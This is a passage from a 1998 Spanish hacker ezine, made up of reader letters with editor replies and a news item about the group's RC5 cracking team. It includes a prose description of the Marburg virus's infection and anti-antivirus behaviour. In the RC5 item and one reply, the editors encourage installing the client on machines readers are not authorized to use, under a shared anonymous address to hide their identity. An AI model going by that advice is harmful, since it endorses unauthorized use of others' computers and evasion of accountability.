  8222.     kind of exploit to become root. ]
  8223.  
  8224. <────────────────────────────────────────────────────────────────────────────>
  8225.  
  8226.   Date: Wed, 11 Nov 1998 05:04:48 GMT
  8227.   From: Ramon <astruc@xxxxxxxxxxxxxx>
  8228.   To: jjf_team@usa.net
  8229.   Subject: Sobre virus muy raro que preguntaba ZeD en ultima revista 
  8230.  
  8231.   Hola:
  8232.  
  8233.   Sobre la consulta de un virus raro, ahi va la respuesta facilitada por 
  8234.   PANDA 
  8235.  
  8236.   El antivirus PANDA detecta perfectamente este virus. 
  8237.  
  8238.   Nombre: Win95/Marburg. 
  8239.  
  8240.   Origen: España. 
  8241.   Fecha: Mayo 1998. 
  8242.   Tamaño aproximado: 8.000 bytes. 
  8243.   Caracteristicas: Accion directa y polimorfico. 
  8244.  
  8245.   Descripcion: Se trata de un virus polimorfico para Windows 95 de 
  8246.   accion directa. Al ejecutar un fichero infectado por el virus este 
  8247.   infecta ficheros PE (portable ejecutable) del directorio actual asi 
  8248.   como de los directorios Windows y System. Por un fallo en el virus no 
  8249.   funciona en Windows NT, solo en Window 95 o Windows 98. 
  8250.  
  8251.   Cuando un fichero infectado se ejecuta el virus busca las rutinas del 
  8252.   KERNEL32: primero busca GetModuleHandleA y GetProcAddress y luego 
  8253.   otras 22 funciones mas. Durante la infeccion el virus usa un metodo 
  8254.   similar al del Win32/Cabanas, analiza la tabla importada del fichero 
  8255.   para GetModuleHandleA y GetProcAddress, y guarda esa direccion en el 
  8256.   codigo del virus, si no hay esas entradas en la tabla el virus 
  8257.   analiza el codigo del KERNEL32. 
  8258.  
  8259.   Si el virus no es capaz de localizar las funciones del KERNEL32 
  8260.   retorna al codigo del fichero inicial. De todas formas reserva un 
  8261.   bloque de memoria del sistema, copia en el su codigo (lo necesita 
  8262.   para ejecutar el polimorfismo) y busca los ficheros para infectarlos. 
  8263.  
  8264.   El virus escribe su codigo al final de los archivos aumentando el 
  8265.   tamaño de estos en unos 8.000 bytes, tras salvar su codigo en el 
  8266.   fichero el virus lo encripta con su rutina polimorfica. Dependiendo 
  8267.   de la estructura del fichero el virus hace varios trucos para hacer 
  8268.   la deteccion y desinfeccion mas compleja: reemplaza la direccion de 
  8269.   comienzo en la cabecera PE por la suya, o salva la instruccion de 
  8270.   salto al virus en la direccion de comienzo del fichero y no modifica 
  8271.   la cabecera, o escribe en el punto de entrada una rutina polimorfica 
  8272.   "basura" seguida de la instruccion de salto al virus. 
  8273.  
  8274.   Antes de infectar los ficheros el virus borra los siguientes ficheros 
  8275.   de datos de antivirus: Anti-vir.dat, chklist.ms, avp.crc y ivb.ntz. 
  8276.   Mientras infecta el virus chequea los nombres de los ficheros y no 
  8277.   infecta aquellos que tienen la letra "V" asi como los antivirus 
  8278.   Panda, F-prot y Scan. 
  8279.  
  8280.   Dependiendo de la fecha del sistema (en los 3 meses siguientes a la 
  8281.   infeccion cuando un fichero infectado es ejecutado a la misma hora en 
  8282.   que se produjo la infeccion) el virus saca en posiciones aleatorias 
  8283.   de la pantalla el icono de error estandar (un circulo rojo con una 
  8284.   cruz blanca). 
  8285.  
  8286.   El virus contiene el siguiente texto: 
  8287.  
  8288.   " GetModuleHandleA GetProcAddress CreateFileA CreateFileMappingA 
  8289.   MapViewOfFile UnmapViewOfFile CloseHandle FindFirstFileA 
  8290.   FindNextFileA 
  8291.   FindClose VirtualAlloc GetWindowsDirectoryA GetSystemDirectoryA 
  8292.   GetCurrentDirectoryA SetFileAttributesA SetFileTime DeleteFileA 
  8293.   GetCurrentProcess WriteProcessMemory LoadLibraryA GetSystemTime 
  8294.   GetDC 
  8295.   LoadIconA DrawIcon 
  8296.  
  8297.   [ Marburg ViRuS BioCoded by GriYo/29A ] 
  8298.     KERNEL32.dll USER32. 
  8299.  
  8300.   Saludos :) 
  8301.  
  8302.   astruc@smileyface.com 
  8303.   http://www.olivet.com/astruc/index.htm32. 
  8304.  
  8305.   <------>
  8306.  
  8307.   [ Thx por el aviso y ya esta aqui la respuesta para Zed. ]
  8308.  
  8309. <────────────────────────────────────────────────────────────────────────────>
  8310.  
  8311.   Date: Sun, 22 Nov 1998 08:50:08 GMT 
  8312.   From: vicente corral collantes <vinny@xxxxxxxxxxxxxx>     
  8313.   To: conde_vampiro@usa.net 
  8314.   Subject: (no subject) 
  8315.   
  8316.   Necesito un buen hacker capaz de entrar en una pagina web, en el disco 
  8317.   duro de unas personas, no son organismos oficiales, pagare el trabajo, 
  8318.   un saludo. 
  8319.   Gracias. 
  8320.  
  8321.   <------>
  8322.  
  8323.   [ XDDDDD si lo hicieramos por dinero lo mas seguro a estas alturas
  8324.     seriamos millonarios, leete nuestro FAQ y olvidamos. ]
  8325.  
  8326. <────────────────────────────────────────────────────────────────────────────>
  8327.  
  8328.   Date: Fri, 20 Nov 1998 07:22:19 GMT 
  8329.   From: "ALEJANDRO VALENTIN" <a080879@xxxxxxxxxxxxxx>     
  8330.   Subject: Hola Me estoy iniciando 
  8331.   
  8332.   HEY conde te habla un futuro hackers quieri si tu puedes desde luego que 
  8333.   me mandes por un e- mail todo lo referente al negocio del hackeo ya que no 
  8334.   se absolutamente nada pero te aclaro que solo hago esto por aprender a 
  8335.   manipular un virus por saber rebentar sistemas, en fin por aprender si 
  8336.   puedes me mandas un algoitmo pßra hacer los virus ya que no pude entra a 
  8337.   esta seccion del la pagina 
  8338.  
  8339.   Recuerda mandarme trucos que un experto hacker no olbida 
  8340.  
  8341.   <------>
  8342.  
  8343.   [ El hacking no es un negocio y si tantas ganas tienes de aprender lee bien
  8344.     este ezine. ]
  8345.  
  8346. <────────────────────────────────────────────────────────────────────────────>
  8347.  
  8348.   From: "Guillermo Suarez" <glsuarez@xxxxxxxxxxxxxx>     
  8349.   To: <"conde_vampiro@usa.net"@xxxxxxxxxxxxxx> 
  8350.   Subject: Saludo 
  8351.   
  8352.   Hola Conde !
  8353.              
  8354.   Espero que estes bien.
  8355.              
  8356.   Te escribo con el animo de decirte que me parece formidable el trabajo del
  8357.   web JJF Hackers Team y me gustaria preguntarte acerca de que si sabes algo
  8358.   acerca de los hackers en Colombia; ya que yo soy de Cali (Colombia) y me
  8359.   gustaria saber como poder ingresar al mundo de los Hackers, Crackers, etc.
  8360.              
  8361.   Agradezco tu pronta respuesta y disculpa las molestias.
  8362.           
  8363.   Atte
  8364.              
  8365.   Memo
  8366.  
  8367.   <------>
  8368.  
  8369.   [ Pues realmente no se como estan las cosas por Colombia, se que hemos
  8370.     recibido mail's de gente por alli, si os interesa os podemos poner en
  8371.     contacto. ]
  8372.  
  8373. <────────────────────────────────────────────────────────────────────────────>
  8374.  
  8375.   From: Alejandro Alan Dominguez Perez <al751181@xxxxxxxxxxxxxx>    
  8376.   To: conde_vampiro@usa.net 
  8377.   Subject: preguntas 
  8378.   
  8379.   Buenos X: 
  8380.  
  8381.   Me encontraba chateando en el mirc cuando me llego un mail de una 
  8382.   persona que me decia que el podia cambiar la pogramacion de las tarjetas 
  8383.   inteligentes de los sistemas de television por satelite digitales es 
  8384.   cierto esto ? se puede realizar? Como se hace? 
  8385.  
  8386.   A|X-Alan 
  8387.   al751181@xxxxxxxxxxxxxx
  8388.  
  8389.   <------>
  8390.  
  8391.   [ Todo es posible pero ya se sabe que por el IRC, la gente hace maravillas
  8392.     ;-) ]
  8393.  
  8394. <────────────────────────────────────────────────────────────────────────────>
  8395.  
  8396.   From: charlott@xxxxxxxxxxxxxx (Carlos Orlando Chacon Vergara)     
  8397.   
  8398.   Hola:
  8399.   necesito informacion  sobre BO y la nea version? Como lo desintalo? paso a
  8400.   paso. El trojano esta en mi Pc.
  8401.  
  8402.   <------>
  8403.  
  8404.   [ Te recomiendo la siguiente utilidad para eliminar el BO.
  8405.  
  8406.     http://www.genocide2600.com/~tattooman/new-uploads/boe.exe ]
  8407.  
  8408. <────────────────────────────────────────────────────────────────────────────>
  8409.  
  8410.   Date: Tue, 17 Nov 1998 02:31:08 GMT 
  8411.   From: "pepe brasas" <muldem@xxxxxxxxxxxxxx>     
  8412.   To: conde_vampiro@usa.net 
  8413.  
  8414.   hola conde vampiro: 
  8415.  
  8416.   ante todo felicitaros a todos por vuestra pagina y por vuestra pequena 
  8417.   revistilla que aunque no entienda ni la mitad creo que es bastante buena. 
  8418.  
  8419.   y es por eso por lo que os escribo,porque soy un principiante en esto de
  8420.   hackear y en el mundo de la informatica.no tengo ni iedea de como 
  8421.   hackear una pagina ya que no entiendo la mayoria de los terminos que 
  8422.   utilizais y tambien porque mi conocimient sobre programacion es muy 
  8423.   pobre. 
  8424.   mi ilusion seria poder hackear algunas de las jodidas paginas del poder 
  8425.   y llegar por lo menos a tener un minimo conocimiento sobre el tema pero 
  8426.   por ahora no tengo las bases suficientes aunque me gustaria 
  8427.   adquirirlas.ahora es cuando es el momento en el que tengo que 
  8428.   pedirte/pediros que si por favor me podriais ayudar aunque solo fuera un 
  8429.   poquito ahora en el comienzo. 
  8430.   muchas gracias. 
  8431.  
  8432.   pepe brasas 
  8433.  
  8434.   <------>
  8435.  
  8436.   [ Como siempre decimos lee nuestro FAQ y este ezine con mucha atencion. ]
  8437.  
  8438. <────────────────────────────────────────────────────────────────────────────>
  8439.  
  8440.   Date: Mon, 16 Nov 1998 15:28:03 GMT 
  8441.   From: Juan_Carlos_Valdes" <agus23@xxxxxxxxxxxxxx>    
  8442.   To: "Conde Vampiro" 
  8443.   Cc: "Conde Vampiro" 
  8444.   Subject: ayudame porfavor 
  8445.   
  8446.   Me llamo Juan Carlos y soy de Argentina
  8447.   Hola como estas, espero que bien, te comento que estoy tratando de iniciarme
  8448.   en este ambiente del Hacking, aunque me parece bastante complicado, pero se
  8449.   que lo voy a lograr algun dia, es que no estoy pasando una buena situacion
  8450.   economica y espero poder safar de esto algun dia. Solo te pido un poco de
  8451.   ayuda (si quereis y teneis ganas de ayudarme). Te cuento que se operar,
  8452.   programar, y reparar oscea no soy un analfabeto en esto y se que si me
  8453.   brindas un poco de tus conocimientos los voy a aprender facilmente yo voy a
  8454.   leer todos los documentos que encuentre relacionado con el hacking. El tema
  8455.   que me intriga y creo que es lo unico que me va a hacer safar de esto es si
  8456.   me podeis enseñar como se hace para sacar dinero de otras cuentas y ponerla
  8457.   en la mia. Tengo una tarjeta Banelco del Banco Rio y puedo sacar dinero con
  8458.   ella del cajero (Lastima que esta vacia) pero la cuenta esta abierta hasta
  8459.   fin de año. Yo lo que queria es pasar dinero de otras cuentas a mi tarjeta
  8460.   y sacarla del cajero. ?Me podeis ayudar? Me podeis brindar esa
  8461.   informacion? te ruego que me ayudes mi situacion es bastante complicada y
  8462.   mis Padres hacen todo lo posible para que siga estudiando. Te cuento que
  8463.   estoy en la Facultad y estudio Ingenieria en Sistemas, y me gustaria seguir
  8464.   con la carrera, pero todo cuesta dinero y no consigo trabajo por ningun 
  8465.   lado, y cuando encontras te quieren explotar con poco dinero ($400) y te
  8466.   dicen que es Full-Time (9:00 a 21:00hs)  y no puedo aceptar porque quiero
  8467.   seguir con mi carrera. Ojala que pueda terminarla, mi sueño es poder irme a
  8468.   otro pais donde se valoren los conocimiento y no te quieran explotar como
  8469.   sucede en Buenos Aires - Argentina. Aca se quieren aprovechar y sacar ventaja
  8470.   de cualquier situacion.
  8471.   Te cuento la ultima. hace poco fui a Comm1 S.A por un trabajo que ofrecian
  8472.   de Tecnico en computacion, esta empresa es la mas importante aqui y estan
  8473.   bañados en plata, me preguntaron cuantas horas podria trabajar y yo les
  8474.   dije que de las 9 hasta las 17:00, 8hs en total y sabes cuanta plata me
  8475.   querian dar? me daban $390 y sin obra social encima, porque decian que eran
  8476.   pocas horas las que trabajaba y mas horas yo no podria por la facultad, ese
  8477.   dinero que me daban no me servia para nada porque tenia un viaje de 1h 20m
  8478.   hasta alli y por mes saque la cuenta me gastaria $150 en viaje. Ves lo que
  8479.   te digo. esto lleno de explotadores y me da bronca (te aclaro que $
  8480.   dolares, muy poca es la diferencia por ahora) Por eso te pido por favor que
  8481.   me ayudes a poder hacer esto. Algun dia te devolvere el favor de alguna
  8482.   manera y si haces esto por mi no lo olvidare jamas. Aqui te dejo mi
  8483.   direccion electronica para que me escribas. Desde ya te agradezco por leer
  8484.   mi carta  
  8485.   agus23@xxxxxxxxxxxxxx
  8486.              
  8487.   sin otro particular, te saludo muy atentamente.
  8488.  
  8489.   <------>
  8490.  
  8491.   [ No considero que tu situacion justifique el robo de informacion o peor
  8492.     todavia monetaria, lo que debes hacer es hablar con la uni sobre una
  8493.     beca o conseguir un trabajo gracias a tus conocimientos. ]
  8494.  
  8495. <────────────────────────────────────────────────────────────────────────────>
  8496.  
  8497.   Date: Mon, 23 Nov 1998 08:25:33 GMT 
  8498.   From: manic_miner@xxxxxxxxxxxxxx     
  8499.   To: jjf_team@usa.net 
  8500.   Subject: buena idea. 
  8501.   
  8502.   Estimado colega: 
  8503.  
  8504.   Esto no es un spam. 
  8505.  
  8506.   Seria grato poder contar contigo de una idea que consiste en publicitar,
  8507.   por medio de banners tu pagina 
  8508.   este proyecto es TOTALMENTE GRATUITO, y sin ningun 
  8509.   tipo de compromiso de tu parte. 
  8510.  
  8511.   Podes ver la prueba en http://www.geocities.com/Baja/Trails/4914/ y en 
  8512.   http://camaleon.com.ar/sponsors.htm (solo el primer banner) 
  8513.  
  8514.   Si estas interesado podes contactar conmigo en: 
  8515.   manic_miner@xxxxxxxxxxxxxx 
  8516.  
  8517.   Gracias. 
  8518.  
  8519.   <------>
  8520.  
  8521.   [ Nosotros ya tenemos la publicidad que querremos :) pero si a alquien le
  8522.     interesa pues ya sabe. ]
  8523.  
  8524. <────────────────────────────────────────────────────────────────────────────>
  8525.  
  8526.   Date: Fri, 20 Nov 1998 18:51:05 GMT 
  8527.   From: "Marcelo F. Lascurain" <mlascu@xxxxxxxxxxxxxx>     
  8528.   Subject: Problemas con el EZINE 
  8529.  
  8530.   No se si sere el unico pero he tenido problemas para poder bajar el N 6,
  8531.   solo me deja hacerlo hasta el curso de linux, y nada mas. Probe como
  8532.   indican, apretando SHIFT antes de pinchar en el link, pero nada.    
  8533.   Sino es demasiado pedir, (disculpen), si pueden enviarmelo por mail, si
  8534.   es zipeado mejor.    
  8535.   Y adelante con su magazine, junto con SET y RAREGAZZ son lo mejor del 
  8536.   underground.
  8537.   Desde Santa Fe, Argentina un cordial saludo.
  8538.   Marcelo              
  8539.  
  8540.   <------>
  8541.  
  8542.   [ Pasate por nuestro FTP. ]
  8543.  
  8544. <────────────────────────────────────────────────────────────────────────────>
  8545.                 
  8546.   Date: Wed, 18 Nov 1998 14:26:21 GMT 
  8547.   From: "ortiz jim" <ortiz_jim@xxxxxxxxxxxxxx>     
  8548.   To: jjf_team@usa.net 
  8549.   Cc: ortizj@xxxxxxxxxxxxxx 
  8550.   Subject: Anonmail 
  8551.   
  8552.   ESPAñOL: 
  8553.   que tal envio este e-mail, solo para preguntar que tan probable es que 
  8554.   identifiquen mi IP al enviar un 
  8555.   e-mail para joder, via Telnet, utilizando el puerto 25. 
  8556.  
  8557.   Ha estan excelentes los archivos para hackear, saludos 
  8558.  
  8559.   ENGLISH: 
  8560.  
  8561.   that such I send this e-mail, alone to ask that so probable is that 
  8562.   identify my ++IP upon sending a e-mail for joder, by ++Telnet, using the 
  8563.   port 25. 
  8564.  
  8565.   It has are excellent the files for hackear, regards 
  8566.  
  8567.   <------>
  8568.  
  8569.   [ Te recomiendo el primer curso de hack del primer ezine, ya que alli esta
  8570.     todo explicado. ]
  8571.  
  8572. <────────────────────────────────────────────────────────────────────────────>
  8573.  
  8574.   Date: Tue, 17 Nov 1998 12:48:06 GMT 
  8575.   From: "Luis Fernando Tirado Correa" <luisfer32@xxxxxxxxxxxxxx>     
  8576.   To: jjf_team@usa.net 
  8577.   
  8578.   Hola amigos!! 
  8579.  
  8580.   les escribo desde colombia!! 
  8581.  
  8582.   reciban un gran saludo!! 
  8583.  
  8584.   les escribo con el fin de que me manden la traduccion de texto de como 
  8585.   hacer un blue-box!! 
  8586.  
  8587.   necesito hacer un aparatico de estos porque mi cuenta de servicios es 
  8588.   gigantesca!! 
  8589.  
  8590.   gracias!! y hasta pronto 
  8591.  
  8592.   <------>
  8593.  
  8594.   [ Pasate por nuestra seccion de Phreak. ]
  8595.  
  8596. <────────────────────────────────────────────────────────────────────────────>
  8597.  
  8598.   Date: Tue, 17 Nov 1998 08:24:28 GMT 
  8599.   From: TVH <tavaha@xxxxxxxxxxxxxx>     
  8600.   To: jjf_team 
  8601.   Subject: peticion 
  8602.   
  8603.   Hola, 
  8604.   Bueno, a pesar de haber incluido vuestro e-zine ya desde hace tiempo en la 
  8605.   taberna, nos gustaria, de todas formas pediros permiso para distribuirla en la 
  8606.   nueva taberna. No creiamos que hiciera falta, puesto que se trata de una 
  8607.   seccion donde se intenta promocionar los magazines españoles. Aun asi, 
  8608.   enmendamos el error pidiendoos permiso formalmente. 
  8609.   Esperamos vuestra respuesta. 
  8610.   Saludos cordiales. 
  8611.  
  8612.   <------>
  8613.  
  8614.   [ No hace falta pedirnos permiso, pero es conveniente que nos aviseis para
  8615.     que estemos al tanto, os pongamos en el ezine como distribuidores
  8616.     oficiales y tb debeis poner nuestro logo de distribuidor.
  8617.     Leete nuestro FAQ. ]
  8618.  
  8619. <────────────────────────────────────────────────────────────────────────────>
  8620.  
  8621.   Date: Sun, 22 Nov 1998 20:02:22 GMT 
  8622.   From: "jac" <esesistemas@xxxxxxxxxxxxxx>     
  8623.   To: <"conde_vampiro@usa.net"@xxxxxxxxxxxxxx> 
  8624.  
  8625.   <------>
  8626.  
  8627.   [ Si envias un mail pon al menos un mensaje!! ]
  8628.  
  8629. <────────────────────────────────────────────────────────────────────────────>
  8630.  
  8631.   Date: Sun, 22 Nov 1998 17:31:41 GMT 
  8632.   From: "Juan Carlos" <spawn2@xxxxxxxxxxxxxx>     
  8633.   Subject: Unix 
  8634.   
  8635.   Hola Conde, creo ke tu revista es genial (y no es por hacer la pelota), 
  8636.   tiene temas interesantes y los explicais muy bien. 
  8637.   Veras yo queria pedirte un favor, es que si tienes alguna guia de Unix o 
  8638.   Linux, alguna especie de manual de comandos y todo lo necesario para 
  8639.   controlar unix perfectamente 
  8640.   espero tu respuesta, aqui te dejo mi direccion: 
  8641.  
  8642.   Spaw2@xxxxxxxxxxxxxx
  8643.  
  8644.   Gracias 
  8645.  
  8646.   <------>
  8647.  
  8648.   [ Leete el fantastico articulo de Letal en el numero 6 de nuestro ezine. ]
  8649.  
  8650. <────────────────────────────────────────────────────────────────────────────>
  8651.  
  8652.   Date: Sun, 22 Nov 1998 13:45:23 GMT 
  8653.   From: "Bartolome Dominguez Martinez" <tolome@xxxxxxxxxxxxxx>     
  8654.   To: conde_vampiro@usa.net 
  8655.   Subject: sobre todo 
  8656.   
  8657.   hola 
  8658.   he estado en tu web y hasta el momento ha sido la mejor del tema, pero 
  8659.   no he podido bajarme nada me haparecia lo del not fount lo siento si soy 
  8660.   breve pero tengo prisa. 
  8661.   haber si me podrias mandar datos sonrelas cajas azules y la de cromo 
  8662.   pero en español. 
  8663.  
  8664.   jhasta otra 
  8665.   cuento con tigo para que lo hagas. 
  8666.  
  8667.   mi e-mail es tolome@xxxxxxxxxxxxxx
  8668.   s 
  8669.  
  8670.   <------>
  8671.  
  8672.   [ Pasate por nuestra seccion de Phreak. ]
  8673.  
  8674. <────────────────────────────────────────────────────────────────────────────>
  8675.  
  8676.   Date:  Tue, 01 Dec 1998 21:49:13 GMT
  8677.   From:  Nicolas Riggeri <nicosr@xxxxxxxxxxxxxx>      
  8678.   To:  conde_vampiro@usa.net  
  8679.   Subject:  Hola conde  
  8680.  
  8681.   Conde, 
  8682.   como estas? 
  8683.   espero que me des bola. 
  8684.   Te cuento que me hace 3 meses no sabia lo que era una computadora hasta 
  8685.   que me compre una, me esta gustando mucho todo esto y quisiera que me 
  8686.   enseñaras algo de hackers: lo que me pueden hacer y lo que yo podria 
  8687.   hacer (no tengo malas intenciones) 
  8688.   Espero que me enseñes algo. 
  8689.   Si queres nos podemos juntar en algun chat a conversar ah tambien en icq 
  8690.   mi numero es el XXXXXXXX o en el poesiacom que es el chat donde yo 
  8691.   entro como NicoDance. 
  8692.   Espero tu respuesta, suerte y gracias ... 
  8693.   ...Chau ! 
  8694.   "Nico" 
  8695.  
  8696.   <------>
  8697.  
  8698.   [ Lee el FAQ y este ezine!! ]
  8699.  
  8700. <────────────────────────────────────────────────────────────────────────────>
  8701.  
  8702.   Date:  Mon, 30 Nov 1998 11:19:15 GMT
  8703.   From:  Sire <sire7@xxxxxxxxxxxxxx>      
  8704.   To:  conde_vampiro@usa.net  
  8705.   Subject:  HOLA  
  8706.  
  8707.   Hey como estas conde_vampiro, bueno te escribo este e-mail agradecerte 
  8708.   por la informacion publicada acerca del IRC, bueno quiero decirte que 
  8709.   a mi en lo personal me gusta todo lo que se refiere a descifrar 
  8710.   password y cosas por el estilo, claro no tengo tus experiencias pero 
  8711.   creo que eso se va adquiriendo poco a poco, bueno el tema es lo 
  8712.   siguiente siendo vos uno de los fundadores del JJFHACKERS TEAM mi 
  8713.   pregunta es como puedo llegar a formar parte de el y recibir 
  8714.   informacion via e-mail acerca de la novedades surgientes con respecto 
  8715.   al Team y proyectos. 
  8716.   Me gustaria si podes que me dieras una mano para que me instruyas un 
  8717.   poco en algunas dudas..? 
  8718.  
  8719.   Bueno conde_vampiro que comiences bien la semana  
  8720.  
  8721.   <------>
  8722.  
  8723.   [ Todas tus preguntas son contestadas en el FAQ de nuestro website :) ]
  8724.  
  8725. <────────────────────────────────────────────────────────────────────────────>
  8726.  
  8727.   Date:  Wed, 25 Nov 1998 00:40:14 GMT
  8728.   From:  alguien@xxxxxxxxxxxxxx      
  8729.   To:  conde_vampiro@usa.net  
  8730.   Subject:  Un paso adelante :)  
  8731.    
  8732.   Veo que estais a punto de estrenar el nuevo dominio JJF.ORG... 
  8733.   Felicitaciones por ese paso adelante. 
  8734.  
  8735.   Que otras cosas nuevas teneis pensado hacer, una vez que el Dominio este 
  8736.   activado? 
  8737.  
  8738.   Alguien 
  8739.  
  8740.   <------>
  8741.  
  8742.   [ Thx, como habras podido comprobar, hemos puesto varias cosillas ;-) ]
  8743.  
  8744. <────────────────────────────────────────────────────────────────────────────>
  8745.  
  8746.   Date:  Tue, 01 Dec 1998 17:49:06 GMT
  8747.   From:  <jmrc@xxxxxxxxxxxxxx>      
  8748.   Subject:  Ayuda  
  8749.  
  8750.   Lei, su articulo para asustar usuarios fastidiosos de los chats, ahora
  8751.   bien tendran algo que funcione en los chat en JAVA.?
  8752.  
  8753.   gracias de antemano
  8754.  
  8755.   <------>
  8756.  
  8757.   [ Claro, leete bien otra vez la guia, ya que viene explicado. ]
  8758.  
  8759. <────────────────────────────────────────────────────────────────────────────>
  8760.  
  8761.   Date:  Tue, 01 Dec 1998 17:44:57 GMT
  8762.   From:  "Rodrigo Da Silva" <noni@@xxxxxxxxxxxxxx>      
  8763.   To:  "J.J.F HACKERS TEAM"  
  8764.   Subject:  Felicitaciones!!!!, su pagina es muy buena  
  8765.  
  8766.   Buenas..., mi nombre es Rodrigo, soy uruguayo, un amigo mio me paso la url
  8767.   de su pagina, y queria felicitarlos porque realmente es excelente, he
  8768.   conseguido alli cosas muy interesantes, y realmente considero que los
  8769.   hackers son unos genios me gustaria formar parte de su equipo, antes no me
  8770.   interesaba el tema del hacking, no sabia ni que era, pero despues de que un
  8771.   hijo de perra, hizo bolsa mi ordenador con back orifice, en busca de una
  8772.   venganza, me he dedicado a bajar programas hacker y cracker, tambien he
  8773.   visto en su pagina las ezing o algo asi, que son articulos con curso de
  8774.   hacker etc, pero por lo que vi en la pagina de los numeros anteriores segun
  8775.   ustedes estan los temas principales, ustedes cuando publican los numeros en
  8776.   la pagina, o los mandan por e_mail?
  8777.   Otra cosa que es en la que preciso su ayuda, es que yo antes tenia el ICQ98
  8778.   y ahora instale el ICQ99, y en el icq98 tenia un crack, el cual me permitia
  8779.   autorizar sin el permiso de los otros, me gustaria si ustedes tienen o
  8780.   saben de donde puedo sacar un crack igual pero para el icq99, tambien me
  8781.   gustaria que me den links para bajar programas para el icq, ya que yo he
  8782.   buscado, pero generalmente nunca puedo entrar porque esas paginas estan
  8783.   levantadas, otra cosa que me parece interesante, seria sacar los password
  8784.   de icq de otra persona, una vez me baje un programa para hacer eso, pero no
  8785.   se como funciona.
  8786.   Y en otra cosa que quiero que me ayuden es que en la seccion de cracks
  8787.   programs de su pagina hay varios cracks pero yo lo que quiero es crackear
  8788.   todos los programas shareware, y en su pagina vi uno "nonag" o algo asi que
  8789.   cumplia esta funcion, pero no lo puedo bajar, me preguntaba si seria mucho
  8790.   pedir que me lo enviaran por mail.
  8791.   Yo creo que dañar a las demas personas esta mal, digo esto porque hay
  8792.   muchos que usan programas para formatear discos, pero en lo que si estoy de
  8793.   acuerdo es en dañar a los que dañan, por eso me gustaria saber si alguno de
  8794.   los integrantes tienen el icq, para contactarlos, porque se de algunas
  8795.   personas que se dedican a joder gente, como me jodieron a mi.
  8796.   En su pagina lei una frase algo asi como :"la informacion pero con etica"
  8797.   eso esta muy bien , totalmente de acuerdo, bueno espero que me contesten,
  8798.   y que me ayuden con lo que les plantie en este mail, y felicitaciones por
  8799.   lo que hacen, que es muy bueno!!!!!
  8800.  
  8801.   Rodrigo
  8802.  
  8803.   <------>
  8804.  
  8805.   [ Thx por los cumplidos y te recomendamos que leas nuestro FAQ. ]
  8806.  
  8807. <────────────────────────────────────────────────────────────────────────────>
  8808.  
  8809.   Date:  Tue, 01 Dec 1998 13:17:35 GMT
  8810.   From:  "Mario Masegosa" <sidoshi@xxxxxxxxxxxxxx>      
  8811.   To:  jjf_team@usa.net  
  8812.   Subject:  Distribuidor oficial de JJF / Hackers Team  
  8813.  
  8814.   Hola, estoy creando una pßgina que puede ser bastante completa sobre 
  8815.   temas de IRC, IRC-War y cosas de Hacking, Ingenierφa Social y todo 
  8816.   esto... por lo que me gustaria que me dierais permiso para convertirme 
  8817.   en Distribuidor oficial de vuestro e-zine, ya que me parece uno de los 
  8818.   mas completos e interesantes, aunque hay algun que otro ariticulo, que la 
  8819.   verdad... de clarificador tiene mas bien poco, pero bueno... lo 
  8820.   importante es que en general es de los mas interesantes. 
  8821.   Ademas deciros que si quereis podeis contar conmigo para escribir 
  8822.   algunos articulos con temas relacionados con el IRC y demas... 
  8823.  
  8824.   Por cierto... tambien estoy tratando de procesar algunos bloques del RC5 
  8825.   y unirme a vosotros... 
  8826.  
  8827.   Y otra cosa... la direccion recibedetodo@hotmail.com para que se va a 
  8828.   utilizar?, me refiero a que si me envian un mensaje alli me lo haceis 
  8829.   llegar vosotros o lo leis vosotros y respondeis vosotros o como va eso? 
  8830.  
  8831.   Muchas gracias. 
  8832.  
  8833.   <------>
  8834.  
  8835.   [ Para lo del ezine y lo de escribir articulos lee el FAQ :) Sobre la
  8836.     cuenta recibedetodo@hotmail.com, no te tienes que preocupar la gestiona
  8837.     Mr. Elektro, se utiliza cuando has puesto el RC5 en una maquina que no
  8838.     deberias y asi no comprometes tu identidad. ]
  8839.  
  8840. <────────────────────────────────────────────────────────────────────────────>
  8841. ██████████████████████████████████████████████████████████████████████████████
  8842. <────────────────────────────────────────────────────────────────────────────>
  8843.  
  8844.                            ------------------------
  8845.                            - NOTICIAS UNDERGROUND -
  8846.                            ------------------------
  8847.   
  8848.                                                 - J.J.F. / HACKERS TEAM -
  8849.  
  8850. <────────────────────────────────────────────────────────────────────────────>
  8851.   JJF RC5 CRACK TEAM. 
  8852.  
  8853.         Para los que no sepan que es esto exactamente o estan perdidos, aqui
  8854.    explicaremos todo lo que necesitais saber. Hemos creado el JJF RC5 Crack
  8855.    Team para participar en el concurso internacional para romper el algoritmo
  8856.    RC5. Este concurso esta patrocinado por la conocida RSA Inc. la cual
  8857.    organiza este concurso para demostrar la fortaleza del RC5, para vendersela
  8858.    al Tio Sam ;-)
  8859.  
  8860.         Empezamos en el puesto 4080 y en el tiempo que llevamos participando
  8861.    hemos alcanzado la posicion    , para ser exactos llevamos   dias en el
  8862.    concurso. A nuestro grupo de RC5 se puede unir todo aquel que quiera, ya
  8863.    que esta formada por voluntarios, a los cuales les damos las gracias por
  8864.    unirse a nuestro equipo :)
  8865.  
  8866.         Para uniros es realmente facil, por lo que os explicare todos los
  8867.    pasos y os queremos ver!!!!
  8868.  
  8869.    1- Existen clientes para muy diversas plataformas entre las que escoger,
  8870.       bajate el cliente que mas os interese. Lo mejor es pasarse por nuestro
  8871.       website, ya que ahi tienes un link directo para bajaros el programa.
  8872.                                                                       
  8873.    2. Configura el cliente(programa) con tu e-mail.
  8874.  
  8875.    3. Procesa y envia (flush) al menos un bloque, pero por supuesto esperamos
  8876.       que sean muchos mas :) O sea ejecuta el programa y dejalo correr un rato
  8877.       para que rompa los bloques RC5 y despues los subes.
  8878.  
  8879.    4. Al dia siguiente chequea tu estatus y edita tu informacion personal en
  8880.       http://www.distributed.net/ Si todo esta ok, recibiras un mail con
  8881.       un password y te vas al url de distributed.net
  8882.  
  8883.    5. En tu informacion personal, en la cual para entrar tienes que meter tu
  8884.       password, afiliate al ID:7281 que es el numero del JJF RC5 Crack Team.
  8885.  
  8886.    6. Ahora instala el cliente en todas las maquinas que puedas. Usando
  8887.       siempre el mismo e-mail para que todos los bloques que envies sean
  8888.       asignados a JJF RC5 Crack Team.
  8889.  
  8890.    Nota: Si no quieres usar tu propio e-mail, puedes usar
  8891.    recibedetodo@hotmail.com de forma que si instalas el cliente en una maquina
  8892.    donde no deberias haberlo hecho, no comprometeras tu identidad.
  8893.    recibedetodo@hotmail.com es parte de JJF RC5 Crack Team.
  8894.  
  8895.         Como veis es realmente facil o sea que todos a romper el RC5!!!!!
  8896.  
